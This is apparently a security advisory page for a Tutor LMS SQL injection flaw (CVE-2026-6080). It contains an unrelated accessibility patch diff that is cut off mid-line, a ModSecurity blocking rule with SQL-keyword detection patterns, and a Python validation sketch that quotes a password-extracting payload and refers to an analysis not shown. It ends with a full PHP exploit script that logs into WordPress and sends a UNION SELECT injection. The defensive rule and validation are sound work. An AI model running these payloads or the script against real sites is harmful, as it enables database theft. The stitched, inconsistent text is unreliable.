--- a/tutor/templates/shortcode/instructor-filter.php
+++ b/tutor/templates/shortcode/instructor-filter.php
@@ -40,13 +40,13 @@
 		<aside class="tutor-col-lg-3 tutor-mb-32 tutor-mb-lg-0" tutor-instructors-filters>
 			<div class="tutor-d-flex tutor-align-center">
 				<div>
-					<span class="tutor-icon-slider-vertical tutor-color-primary tutor-mr-8" area-hidden="true"></span>
+					<span class="tutor-icon-slider-vertical tutor-color-primary tutor-mr-8" aria-hidden="true"></span>
 					<span class="tutor-fs-5 tutor-fw-medium tutor-color-black"><?php esc_html_e( 'Filters', 'tutor' ); ?></span>
 				</div>

 				<div class="tutor-ml-32">
 					<a href="#" class="tutor-btn tutor-btn-ghost" tutor-instructors-filter-clear>
-						<span class="tutor-icon-times tutor-mr-8" area-hidden="true"></span>
+						<span class="tutor-icon-times tutor-mr-8" aria-hidden="true"></span>
 						<span class="tutor-fw-medium"><?php esc_html_e( 'Clear', 'tutor' ); ?></span>
 					</a>
 				</div>
@@ -73,7 +73,7 @@

 					<?php if ( $show_more ) : ?>
 						<a href="#" class="tutor-btn-show-more tutor-btn tutor-btn-ghost tutor-mt-32" data-tutor-toggle-more=".tutor-toggle-more-content">
-							<span class="tutor-toggle-btn-icon tutor-icon tutor-icon-plus tutor-mr-8" area-hidden="true"></span>
+							<span class="tutor-toggle-btn-icon tutor-icon tutor-icon-plus tutor-mr-8" aria-hidden="true"></span>
 							<span class="tutor-toggle-btn-text"><?php esc_html_e( 'Show More', 'tutor' ); ?></span>
 						</a>
 					<?php endif; ?>
@@ -89,7 +89,7 @@
 				<div class="tutor-ratings tutor-ratings-lg tutor-ratings-selectable">
 						<div class="tutor-ratings-stars">
 							<?php for ( $i = 1; $i < 6; $i++ ) : ?>
-								<i class="tutor-icon-star-line" tutor-instructors-filter-rating data-value="<?php echo esc_attr( $i ); ?>" area-hidden="true"></i>
+								<i class="tutor-icon-star-line" tutor-instructors-filter-rating data-value="<?php echo esc_attr( $i ); ?>" aria-hidden="true"></i>
 							<?php endfor; ?>
 						</div>
 						<span class="tutor-ratings-count tutor-instructor-rating-filter" tutor-instructors-filter-rating-count></span>
@@ -99,12 +99,12 @@
 		</aside>

 		<?php if ( $columns < 3 ) : ?>
-		<div class="tutor-col-1 tutor-d-none tutor-d-xl-block" area-hidden="true"></div>
+		<div class="tutor-col-1 tutor-d-none tutor-d-xl-block" aria-hidden="true"></div>
 		<?php endif; ?>

 		<main class="tutor-col-lg-9 tutor-col-xl-<?php echo $columns < 3 ? 8 : 9; ?>">
 			<div class="tutor-form-wrap tutor-mb-24">
-				<span class="tutor-icon-search tutor-form-icon" area-hidden="true"></span>
+				<span class="tutor-icon-search tutor-form-icon" aria-hidden="true"></span>
 				<input type="text" class="tutor-form-control" name="keyword" placeholder="<?php esc_html_e( 'Search any instructor...', 'tutor' ); ?>" tutor-instructors-filter-search />
 			</div>
 			<div class="tutor-d-flex tutor-align-center tutor-mb-24">
--- a/tutor/templates/single-content-loader.php
+++ b/tutor/templates/single-content-loader.php
@@ -97,7 +97,7 @@
 				</div>
 				<div class="list-item-progress tutor-my-16">
 					<div class="tutor-progress-bar tutor-mt-12" style="--tutor-progress-value:<?php echo esc_attr( $course_stats['completed_percent'] ); ?>%;">
-						<span class="tutor-progress-value" area-hidden="true"></span>
+						<span class="tutor-progress-value" aria-hidden="true"></span>
 					</div>
 				</div>
 			</div>
--- a/tutor/templates/single/common/footer.php
+++ b/tutor/templates/single/common/footer.php
@@ -30,7 +30,7 @@
 <div class="tutor-course-topic-single-footer tutor-px-32 tutor-py-12 tutor-mt-auto">
 	<div class="tutor-single-course-content-prev">
 		<a class="tutor-btn tutor-btn-secondary tutor-btn-sm" href="<?php echo esc_url( $prev_link ); ?>"<?php echo ! $previous_id ? ' disabled="disabled"' : ''; ?>>
-			<span class="tutor-icon-<?php echo is_rtl() ? 'next' : 'previous'; ?>" area-hidden="true"></span>
+			<span class="tutor-icon-<?php echo is_rtl() ? 'next' : 'previous'; ?>" aria-hidden="true"></span>
 			<span class="tutor-ml-8"><?php esc_html_e( 'Previous', 'tutor' ); ?></span>
 		</a>
 	</div>
@@ -38,7 +38,7 @@
 	<div class="tutor-single-course-content-next">
 		<a class="tutor-btn tutor-btn-secondary tutor-btn-sm" href="<?php echo esc_url( $next_link ); ?>"<?php echo ! $next_id ? ' disabled="disabled"' : ''; ?>>
 			<span class="tutor-mr-8"><?php esc_html_e( 'Next', 'tutor' ); ?></span>
-			<span class="tutor-icon-<?php echo is_rtl() ? 'previous' : 'next'; ?>" area-hidden="true"></span>
+			<span class="tutor-icon-<?php echo is_rtl() ? 'previous' : 'next'; ?>" aria-hidden="true"></span>
 		</a>
 	</div>
 </div>
--- a/tutor/templates/single/common/header.php
+++ b/tutor/templates/single/common/header.php
@@ -48,11 +48,11 @@
 ?>
 <div class="tutor-course-topic-single-header tutor-single-page-top-bar">
 	<a href="#" class="tutor-course-topics-sidebar-toggler tutor-iconic-btn tutor-iconic-btn-secondary tutor-d-none tutor-d-xl-inline-flex tutor-flex-shrink-0" tutor-course-topics-sidebar-toggler>
-		<span class="tutor-icon-left" area-hidden="true"></span>
+		<span class="tutor-icon-left" aria-hidden="true"></span>
 	</a>

 	<a href="<?php echo esc_url( get_the_permalink( $course_id ) ); ?>" class="tutor-iconic-btn tutor-d-flex tutor-d-xl-none">
-		<span class="tutor-icon-previous" area-hidden="true"></span>
+		<span class="tutor-icon-previous" aria-hidden="true"></span>
 	</a>

 	<div class="tutor-course-topic-single-header-title tutor-fs-6 tutor-ml-12 tutor-ml-xl-24">
@@ -92,13 +92,13 @@
 		}
 		?>
 		<a class="tutor-iconic-btn tutor-flex-shrink-0" href="<?php echo esc_url( get_the_permalink( $course_id ) ); ?>">
-			<span class="tutor-icon-times" area-hidden="true"></span>
+			<span class="tutor-icon-times" aria-hidden="true"></span>
 		</a>
 	</div>

 	<div class="tutor-ml-auto tutor-align-center tutor-d-block tutor-d-xl-none">
 		<a class="tutor-iconic-btn" href="#" tutor-course-topics-sidebar-offcanvas-toggler>
-			<span class="tutor-icon-hamburger-menu" area-hidden="true"></span>
+			<span class="tutor-icon-hamburger-menu" aria-hidden="true"></span>
 		</a>
 	</div>
 </div>
--- a/tutor/templates/single/course/course-benefits.php
+++ b/tutor/templates/single/course/course-benefits.php
@@ -25,7 +25,7 @@
 		<ul class="tutor-course-details-widget-list tutor-color-black tutor-fs-6 tutor-m-0 tutor-mt-16">
 			<?php foreach ( $course_benefits as $benefit ) : ?>
 				<li class="tutor-d-flex tutor-mb-12">
-					<span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" area-hidden="true"></span>
+					<span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" aria-hidden="true"></span>
 					<span><?php echo esc_html( $benefit ); ?></span>
 				</li>
 			<?php endforeach; ?>
--- a/tutor/templates/single/course/course-content.php
+++ b/tutor/templates/single/course/course-content.php
@@ -37,7 +37,7 @@

 		<?php if ( $has_show_more ) : ?>
 		<a href="#" class="tutor-btn-show-more tutor-btn tutor-btn-ghost tutor-mt-32" data-tutor-toggle-more=".tutor-toggle-more-content">
-			<span class="tutor-toggle-btn-icon tutor-icon tutor-icon-plus tutor-mr-8" area-hidden="true"></span>
+			<span class="tutor-toggle-btn-icon tutor-icon tutor-icon-plus tutor-mr-8" aria-hidden="true"></span>
 			<span class="tutor-toggle-btn-text"><?php esc_html_e( 'Show More', 'tutor' ); ?></span>
 		</a>
 	<?php endif; ?>
--- a/tutor/templates/single/course/course-entry-box.php
+++ b/tutor/templates/single/course/course-entry-box.php
@@ -99,7 +99,7 @@
 							</span>
 						</div>
 						<div class="tutor-progress-bar tutor-mt-12" style="--tutor-progress-value:<?php echo esc_attr( $completed_percent ); ?>%;">
-							<span class="tutor-progress-value" area-hidden="true"></span>
+							<span class="tutor-progress-value" aria-hidden="true"></span>
 						</div>
 					</div>
 				</div>
@@ -234,7 +234,7 @@
 				?>
 					<div class="tutor-alert tutor-warning tutor-mt-28">
 						<div class="tutor-alert-text">
-							<span class="tutor-icon-circle-info tutor-alert-icon tutor-mr-12" area-hidden="true"></span>
+							<span class="tutor-icon-circle-info tutor-alert-icon tutor-mr-12" aria-hidden="true"></span>
 							<span>
 								<?php esc_html_e( 'This course is full right now. We limit the number of students to create an optimized and productive group dynamic.', 'tutor' ); ?>
 							</span>
--- a/tutor/templates/single/course/course-requirements.php
+++ b/tutor/templates/single/course/course-requirements.php
@@ -27,7 +27,7 @@
 		<ul class="tutor-course-details-widget-list tutor-fs-6 tutor-color-black">
 			<?php
 			foreach ( $course_requirements as $requirement ) {
-				echo '<li class="tutor-d-flex tutor-mb-12"><span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" area-hidden="true"></span><span>' . esc_html( $requirement ) . '</span></li>';
+				echo '<li class="tutor-d-flex tutor-mb-12"><span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" aria-hidden="true"></span><span>' . esc_html( $requirement ) . '</span></li>';
 			}
 			?>
 		</ul>
--- a/tutor/templates/single/course/course-target-audience.php
+++ b/tutor/templates/single/course/course-target-audience.php
@@ -26,7 +26,7 @@
 		<ul class="tutor-course-details-widget-list tutor-fs-6 tutor-color-black">
 			<?php foreach ( $target_audience as $audience ) : ?>
 				<li class="tutor-d-flex tutor-mb-12">
-					<span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" area-hidden="true"></span>
+					<span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" aria-hidde

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
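# Atomic Edge WAF Rule - CVE-2026-6080
# Blocks SQL injection via date parameter in Tutor LMS instructor listing
# The first rule carries the disruptive action; the chained rules narrow it to
# the instructor-list action and then inspect the date value.
# REQUEST_FILENAME is matched so the comparison does not depend on the query string.
SecRule REQUEST_FILENAME "@streq /wp-admin/admin-ajax.php" \
  "id:20266080,phase:2,deny,status:403,chain,msg:'CVE-2026-6080 SQL Injection via Tutor LMS date parameter',severity:'CRITICAL',tag:'CVE-2026-6080',tag:'WordPress',tag:'Plugin/Tutor-LMS',tag:'attack-sql-injection'"
  SecRule ARGS_POST:action "@streq tutor_instructor_list" "chain"
    # Whitespace is compressed rather than removed: the pattern relies on \s and \b
    # around keywords, which cannot match once all whitespace has been stripped.
    SecRule ARGS_POST:date "@rx (?i)(?:'\s*(?:union|select|insert|update|delete|drop|create|alter|exec|declare|xp_|benchmark|sleep|waitfor)\s|(?:select|union)\s.*\sfrom\s|\b(?:version|user|database|schema)\(\)|\b(?:concat|group_concat)\s*\(|\binformation_schema\b|\bsysdatabases\b|\bsysobjects\b)" \
      "t:urlDecodeUni,t:removeNulls,t:lowercase,t:compressWhitespace"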
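The `date` value is only ever meant to be a calendar date, so a strict allow-list is a tighter control than keyword matching. The sketch below is an added example, not Atomic Edge's or the plugin's code: it approximates the rule's transformations and its pattern (regex escapes restored) in Python and compares them with a hypothetical `is_valid_date` check over constructed sample values plus the payload quoted in the analysis above.

```python
import re
from datetime import datetime
from urllib.parse import unquote

# Pattern from the WAF rule, with \s, \b and \( escapes restored.
BLOCKLIST = re.compile(
    r"(?i)(?:'\s*(?:union|select|insert|update|delete|drop|create|alter|exec|"
    r"declare|xp_|benchmark|sleep|waitfor)\s"
    r"|(?:select|union)\s.*\sfrom\s"
    r"|\b(?:version|user|database|schema)\(\)"
    r"|\b(?:concat|group_concat)\s*\("
    r"|\binformation_schema\b|\bsysdatabases\b|\bsysobjects\b)"
)

# Strict shape for the parameter: YYYY-MM-DD, ASCII digits only.
DATE_SHAPE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")

# Payload quoted in the advisory text; the other samples are constructed.
PAGE_EXAMPLE = "2024-01-01' UNION SELECT user_login,user_pass FROM wp_users-- -"
SAMPLES = ["2024-01-01", "2024-02-30", "01/01/2024", "tomorrow", PAGE_EXAMPLE]


def normalize(value: str) -> str:
    """Rough stand-in for urlDecodeUni, removeNulls, lowercase, compressWhitespace."""
    value = unquote(value).replace("\x00", "").lower()
    return re.sub(r"\s+", " ", value)


def blocklist_hit(value: str) -> bool:
    """True when the keyword pattern matches the normalized value."""
    return BLOCKLIST.search(normalize(value)) is not None


def is_valid_date(value: str) -> bool:
    """Allow-list check (hypothetical helper): exact shape and a real calendar date."""
    if DATE_SHAPE.fullmatch(value) is None:
        return False
    try:
        datetime.strptime(value, "%Y-%m-%d")
    except ValueError:
        return False
    return True


def triage(values):
    """Return (value, passes_allow_list, matches_blocklist) for each input."""
    return [(v, is_valid_date(v), blocklist_hit(v)) for v in values]


if __name__ == "__main__":
    for value, allowed, blocked in triage(SAMPLES):
        print(f"{value!r:70} allow-list={allowed!s:5} blocklist-hit={blocked}")
```

The allow-list rejects every sample that is not a real `YYYY-MM-DD` date, whether or not the keyword pattern recognises it, which is why validating the parameter's format is the sturdier of the two checks.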

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6080 - Tutor LMS <= 3.9.8 - Authenticated (Admin+) SQL Injection via 'date' Parameter

<?php
/**
 * Proof of Concept for CVE-2026-6080
 * Requires valid WordPress administrator credentials
 * Targets the vulnerable instructor listing functionality
 */

$target_url = 'https://vulnerable-site.com';
$username = 'admin';
$password = 'password';

// Step 1: Authenticate to WordPress and obtain nonce
function get_wp_nonce($target_url, $username, $password) {
    $login_url = $target_url . '/wp-login.php';
    $admin_url = $target_url . '/wp-admin/';
    
    // Create a cookie jar for session persistence
    $cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_6080');
    
    // Initial request to get login form cookies
    $ch = curl_init($login_url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEJAR => $cookie_file,
        CURLOPT_COOKIEFILE => $cookie_file,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false
    ]);
    $response = curl_exec($ch);
    
    // Extract the login nonce (log) from the form
    preg_match('/name="log" value="([^"]+)"/', $response, $log_match);
    preg_match('/name="pwd" value="([^"]+)"/', $response, $pwd_match);
    
    // Submit login credentials
    $post_fields = [
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    ];
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $login_url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($post_fields)
    ]);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Now access admin to get AJAX nonce
    $ch = curl_init($admin_url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEJAR => $cookie_file,
        CURLOPT_COOKIEFILE => $cookie_file,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false
    ]);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Extract AJAX nonce from the page
    preg_match('/"ajaxnonce":"([a-f0-9]+)"/', $response, $nonce_match);
    
    unlink($cookie_file);
    
    return $nonce_match[1] ?? null;
}

// Step 2: Exploit the SQL injection via date parameter
function exploit_sql_injection($target_url, $ajax_nonce) {
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    
    // SQL injection payload to extract database version
    // The payload bypasses the CAST() function and appends a UNION query
    $malicious_date = "2024-01-01' UNION SELECT @@version,2,3,4,5,6,7,8,9,10-- ";
    
    $post_fields = [
        'action' => 'tutor_instructor_list',  // This action triggers the vulnerable code
        'date' => $malicious_date,
        'page' => '1',
        'per_page' => '10',
        '_ajax_nonce' => $ajax_nonce
    ];
    
    $ch = curl_init($ajax_url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($post_fields),
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return ['code' => $http_code, 'response' => $response];
}

// Execute the exploit
$ajax_nonce = get_wp_nonce($target_url, $username, $password);

if ($ajax_nonce) {
    echo "[+] Obtained AJAX nonce: $ajax_nonce\n";
    echo "[+] Sending SQL injection payload...\n";
    
    $result = exploit_sql_injection($target_url, $ajax_nonce);
    
    echo "[+] HTTP Response Code: " . $result['code'] . "\n";
    echo "[+] Response: " . $result['response'] . "\n";
    
    // Parse the JSON response to extract injected data
    $data = json_decode($result['response'], true);
    if ($data && isset($data['data']) && isset($data['data']['instructors'])) {
        echo "[+] Extracted database version from first instructor record:\n";
        print_r($data['data']['instructors'][0]);
    }
} else {
    echo "[-] Failed to obtain AJAX nonce. Check credentials.\n";
}

?>
